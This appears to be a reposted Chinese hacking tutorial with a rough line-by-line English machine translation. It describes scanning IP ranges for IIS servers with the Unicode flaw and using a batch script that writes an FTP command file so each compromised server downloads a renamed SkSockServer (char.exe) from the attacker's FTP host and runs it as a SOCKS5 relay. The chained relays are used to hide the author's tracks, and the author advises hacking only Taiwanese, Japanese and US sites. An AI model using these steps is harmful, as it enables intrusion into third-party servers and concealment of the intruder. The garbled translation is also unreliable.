安全卫士 Security guards
snake的sksockserver(代理跳板)是一个非常好的的socks5 代理服务器。 snake's sksockserver (agent springboard) is a very good of socks5 proxy server. 它非常小巧,才32K,但是可以比较完整的支持tcp协议和udp协议,也支持oicq,而且它具有将通信数据在各跳板之间加密的功能。 It is very small, only 32K, but can be more complete support for tcp and udp protocol agreement also supports oicq, and it has a springboard to communication between the various data encryption function. 这使我们能很好的掩盖自己网上踪迹。 This allows us to cover their online tracks well. 不过,使用它需要一定的服务器入侵知识,这对新手菜鸟是个很大的挑战。 However, using it requires a certain knowledge of the invasion of servers, which is a big novice rookie challenge. 因此,我写下这篇文章,希望对大家有所帮助。 So I wrote this article, we want to help.
所需软件: 流光4 、 代理跳板:SkSockServer 、 代理猎手 Required Software: streamer 4, agents springboard: SkSockServer, proxy hunter
准备工作:请申请一个ftp 空间,现在的免费主页大都带有ftp 空间的。 Preparation: Please apply for a ftp space, and now most of the free home page space with ftp. 假设申请的ftp 空间地址为ftp.server.com,用户名为tom ,密码是pass 。 Assuming the application ftp space address ftp.server.com, user name is tom, password is pass. 将SkSockServer.exe 改名为char.exe 上传到ftp Will SkSockServer.exe renamed char.exe upload to ftp
空间。 Space. 改名的目的当然是为了不那么起眼,你随便改好了。 Name change of course is not so up to the eye, you just changing for the better.
步骤: Steps:
一:在C 盘根目录下面建立一个文本文件pp.txt,内容如下: A: In the C root directory create a text file pp.txt, as follows:
echo open ftp.server.com>af.txt echo open ftp.server.com> af.txt
echo tom>>af.txt echo tom>> af.txt
echo pass>>af.txt echo pass>> af.txt
echo bin>>af.txt echo bin>> af.txt
echo get char.exe>>af.txt echo get char.exe>> af.txt
echo bye>>af.txt echo bye>> af.txt
ftp -s:af.txt ftp-s: af.txt
del a.txt del a.txt
del af.txt del af.txt
char -debug 5262 char-debug 5262
注意了,请用你的真实的ftp 网站地址、用户名、密码代替上面的ftp.server.com 、 tom 和pass Note, please use your real ftp site address, user name, password, instead of the above ftp.server.com, tom and pass
,否则就不会成功的。 Or they will not succeed. 现在来检查你的文件是否正确,复制一份pp.txt ,将它的扩展名改为bat ,即将文件改名为pp.bat 。 Now to check your file is correct, copy pp.txt, its extension to the bat, will rename the file pp.bat. 拨号上网,执行pp.bat ,如果你没有写错,那在pp.bat 所在目录下面应该会有一个char.exe 。 Dial-up Internet access, executive pp.bat, if you do not mistake, that in pp.bat there should be a directory where char.exe. 如果char.exe 文件不在,检查你的网络连接是否正常,自己用ftp 软件去看看自己的空间里面是否有char.exe 这个文件。 If char.exe file is not, check your network connection is normal, they used their own ftp software to see if there char.exe space inside the file. 最重要的要检查ftp 服务器有没有写错,用户名和密码是否正确。 Most important to check the ftp server has no mistake, the user name and password are correct.
我来解释一下这个文件的意思.如果你学过dos ,就会很清楚上面pp.txt文件的作用了。 I explain the meaning of this file if you learned dos, files will be very clear that the role of the above pp.txt.
echo 命令是在屏幕上显示你输入的字符。 The echo command is displayed on the screen you type in the characters. 如,在dos 下面,输入echo hello,那它就会显示“hello”。 For example, in dos, enter echo hello, then it will display "hello".
“ > ”是管道重定向符号,执行dos 命令echo hello>a.txt,命令执行的结果是将hello 写在一个a.txt ">" Is a pipe redirection symbol, perform the dos command echo hello> a.txt, command execution result is written in a a.txt hello
文件上, 原先a.txt 文件的内容会被删掉,变成只有hello 这个单词。 File, the original a.txt file content will be deleted, become only the word hello. 如果a.txt 文件不存在,那它会自己生成一个新文件。 If a.txt file does not exist, then it will generate a new file yourself. “ >>" 和">" 不同的地方是它不会删掉文件原有的内容,只会在文件后面追加新内容。 ">>" And ">" The difference is that it does not delete the original file contents, file append only new content.
好了,我们来看pp.txt 文件执行的结果 Well, we look at the results of implementation pp.txt file
echo open ftp.server.com>af.txt echo tom>>af.txt echo pass>>af.txt echo open ftp.server.com> af.txt echo tom>> af.txt echo pass>> af.txt
echo bin>>af.txt echo get char.exe>>af.txt echo bye>>af.txt echo bin>> af.txt echo get char.exe>> af.txt echo bye>> af.txt
上面这几个命令执行的结果是在当前路径下生成一个af.txt 文件,内容如下: The above results of these commands are executed in the current path generates a af.txt file, as follows:
open ftp.server.com open ftp.server.com
tom tom
pass pass
bin bin
get char.exe get char.exe
bye bye
然后是执行ftp af.txt Then the implementation of ftp af.txt
这让系统调用ftp 命令,下载char.exe 文件。 This allows the system calls the ftp command, download char.exe file.
下面的就没有什么好说了 The following are not any easy to say
分别是删除a.txt , af.txt 文件,在5262 端口上进行socks5 服务。 Are deleted a.txt, af.txt file, in 5262 socks5 on port services.
二:打开流光4, 按Ctrl+R ,在弹出的对话框中,填写你想搜索的IP 范围,建议搜索台湾、美国或者日本的网站,它们漏洞比较多。 Two: Open the streamer 4, by Ctrl + R, in the dialog box, fill in the IP range you want to search, the proposed search of Taiwan, the United States or Japan's website, they are more loopholes. 扫描主机类型改为IIS/FrontPage, 这里我搜索210.59.70.1 - 210.59.72.254 。 Scanning the host type to IIS / FrontPage, here I search 210.59.70.1 - 210.59.72.254. 搜索结束后会弹出提示的,这里我用了约5 分钟时间。 After the search prompt will pop up, where I spent about 5 minutes. 在流光中间一栏会出现你搜索到的结果,分为主机、系统版本、类型、描述四项。 In the middle column will appear streamer your search results, into the host, system version, type, description of four. 如果主机是黑色的,也就是在类型那一栏里写着Remote Excute X ,( X 是从A 到E 之间的字母,)那这台主机就是有unicode 漏洞了。 If the host is black, that is, the type of that column was written in the Remote Excute X, (X is the letter between A to E,) that this host is a unicode vulnerability. 点击它,选连接,将允许IIS 检测CMD 去掉,然后我们就可以执行命令了。 Click it, choose to connect, to allow IIS to remove the detection of CMD, and then we can execute commands.
三:先输入一个命令,看看它是否允许我们写入文件。 Three: to enter a command, to see if it allows us to write to a file.
我们输入echo hello>a.txt,这时,可能出现几种提示: We enter echo hello> a.txt, then, may appear several tips:
A. 如果文件允许写入,就只会显示[echo hello>a.txt] A. If the file is allowed to write, it will only show [echo hello> a.txt]
那这台服务器就可以作为我们的跳板了。 That this server can be used as a springboard us.
B. 服务器不允许输入,那么会显示[echo hello>a.txt] Access is denied. B. the server does not allow the input, it will display [echo hello> a.txt] Access is denied.
这表示这台服务器不允许我们写入文件,呵呵,去找下一台吧,这台没戏了。 This means that this server does not allow us to write the file, huh, huh, go to the next station it, this game is up.
C. 使用了陷阱技术,[echo hello>a.txt] HTTP/1.1 502 Gateway Error C. Use a trap technology, [echo hello> a.txt] HTTP/1.1 502 Gateway Error
那可能是主机做了一定的防范措施,你可以再重新试试刚才那个命令,也许行的。 That may be the host to do some preventive measures, you can just try that command again, maybe the line.
D. 其它 D. Other
我也不知道原因了。 I do not know why. 试试直接执行下面步骤吧,也许会成功。 Perform the following steps to try direct it, might succeed.
好了,出现A 的情况,那表示这台主机可以作为跳板了。 Well, there's the case A, it means that this host can be used as a springboard. 再输入 Enter
local file:c:\pp.txt local file: c: \ pp.txt
这个命令就是让流光依次执行c:\pp.txt 里面的指令,免除我们一个个输入的麻烦。 This command is to allow the passing sequentially c: \ pp.txt inside the command, eliminating the trouble of one of our input. 它的输出大致如下: Its output is as follows:
[local file:c:\pp.txt] [Local file: c: \ pp.txt]
[echo open ftp.server.com>af.txt] [Echo open ftp.server.com> af.txt]
[echo tom>>af.txt] [Echo tom>> af.txt]
[echo pass>>af.txt] [Echo pass>> af.txt]
[echo bin>>af.txt] [Echo bin>> af.txt]
[echo get char.exe>>af.txt] [Echo get char.exe>> af.txt]
[echo bye>>af.txt] [Echo bye>> af.txt]
[ftp -s:af.txt] [Ftp-s: af.txt]
[del af.txt] [Del af.txt]
[char -debug 5262] [Char-debug 5262]
在有些机器上执行的输出有些差异,但基本上是这样的。 In some machines running on output are some differences, but basically is this. 如果在其中的某一个命令出现了“ HTTP/1.1 502 Gateway Error ” ,那你就要重新执行local file:c:\pp.txt If a certain order in which the emergence of "HTTP/1.1 502 Gateway Error", then you have to re-run local file: c: \ pp.txt
如果出现Connect Failed ,那可能是你的网络连接有问题,检查一下是不是掉线了,再重新执行 If Connect Failed, it may be your network connection problems, check is not dropped, then re-run
local file:c:\pp.txt local file: c: \ pp.txt
四: 我们现在来验证跳板是否真正运行。 4: We are a springboard to really run to verify. 运行代理猎手,添加结果,将上面那台主机的IP 加上去,端口是5262 (就是我爱菱儿啦!),协议是socks5 。 Proxy Hunter is running, add the results, that the above coupled to the IP host and port is 5262 (that is, I Ailing children it!), The agreement is socks5. 验证它的结果是否free 。 The results verify that it is free. 如果是就行了。 If it is on the line. 不是重新执行一次local file:c:\pp.txt 吧。 Not re-run a local file: c: \ pp.txt it. 再不行只好放弃了,另外找一台机器好了。 And then not had to give up, the other to find a machine better. 关掉IIS 远程命令行,再选择另外一台有unicode 漏洞的机器重复步骤三,这样就可以将所有搜索到的unicode 漏洞机器作为你的跳板了。 Turn off the IIS remote command line, then choose another one has unicode vulnerable machines repeat step three, so that you can search all the unicode vulnerability of the machine as your springboard.
五: 运行skserver 图形版本,选配置-经过的skserver ,将刚才弄好的一两个跳板加上去。 Five: Run skserver graphical version, choose Configuration - After the skserver, will have just one or two things right with a springboard to go. 在这里不要加太多的跳板,否则会影响你的浏览速度,如果没有特殊需要,一个就可以了。 Do not add too much here springboard, otherwise it will affect your browsing speed, if no special needs, a it. 按ok 后在命令里面选择停止,再选择开始,你现在就拥有了一个加密的socks5 代理。 After the command which press ok choose to stop, and then select Start, you now have an encrypted socks5 proxy. 可以用sockscap 或者nec e-border client 等socks 接口软件来调度你的网络程序,呵呵,现在就尽情的冲浪吧。 Can sockscap or nec e-border client such as socks interface software to schedule your web application, Oh, now enjoy surfing it.
注意事项: 因为利用unicode 漏洞得到的权限很低,所以不能让sksockserver 作为服务运行,也就不能让它每次开机自动运行了。 Note: Because the use of loopholes to get permission to unicode very low, so we can not let sksockserver run as a service, it does not start automatically each time it runs. 如果它停了你可以很方便的再次运行它。 If it is stopped you can easily run it again. 和建立时候一样,打开IIS 命令行,然后运行这个命令就可以了char -debug 5262。 And establish the same time, open the IIS command line, then run this command on char-debug 5262. 如果你有任何的疑问,请来信一起探讨。 If you have any questions, please contact us to explore together.
致谢:非常感激snake 的代理跳板,它让我可以穿过学校的封锁,尽情的冲浪和与我的菱儿聊天。 Thanks: grateful snake's agent springboard, it allows me to pass through the blockade of the school, enjoy the surf and chat with my children Ling. 也谢谢小榕,它的流光是我见过最强大而简单的黑客软件。 Also thank Xie Xiaorong, it's the most powerful I've ever seen streamer and simple hacking software. 当然了,我更加不会忘记太阳风,他的代理猎手是带领我走进网络之门的程序。 Of course, I will not forget the sun, more wind, his agent hunter is the door to lead me into the network program.
补充: Added:
按我的方法基本上是无法擦除入侵痕迹的。 According to my method basically can not erase traces of the invasion. 所以,大家要注意安全,一定不要黑国内的网站。 Therefore, we should pay attention to safety, must not be black domestic sites. 如果是黑台湾、日本、美国的小网站,根本没有人会管! If it is black, Taiwan, Japan, the United States, small sites, no one will bother! 另外,用跳板黑会很安全的,只是,当你用它作跳板的时候,同时也暴露了你的IP。 In addition, Black will be safe with a springboard, only when you use it as a springboard the time, but also exposes your IP. 放心了,按我的方法你绝对不会误伤国内的网站的,想黑还黑不到呢。 Ease, according to my method you will not accidentally injure the domestic site, do not want black also black. 流光不允许对国内网站进行探测。 Streamer does not allow detection of domestic sites.
至于说能不能在服务器上面写文件,我想我在文章里面已经交待清楚了。 As above, able to write files on the server, I think I made clear in the article which has a. 在步骤一里我要大家先输入一个命令echo hello>a.txt ,如果服务器不允许写文件,那它就会返回Access Denied。 In step one where I want you to enter a command echo hello> a.txt, if the server does not allow to write the file, then it will return Access Denied. 这时只好找另外一个服务器了。 Then had to find another server.
判断能不能将该服务器作为跳板的最简单方法。 Can not determine the server as a springboard to the most simple way.
在步骤一中先输入echo hello>a.txt In step 1 to enter echo hello> a.txt
然后再输入dir a.txt Then enter dir a.txt
如果a.txt文件存在,那就可以用它作跳板了。 If the a.txt file exists, then you can use it as a springboard of.
Tidak ada komentar:
Posting Komentar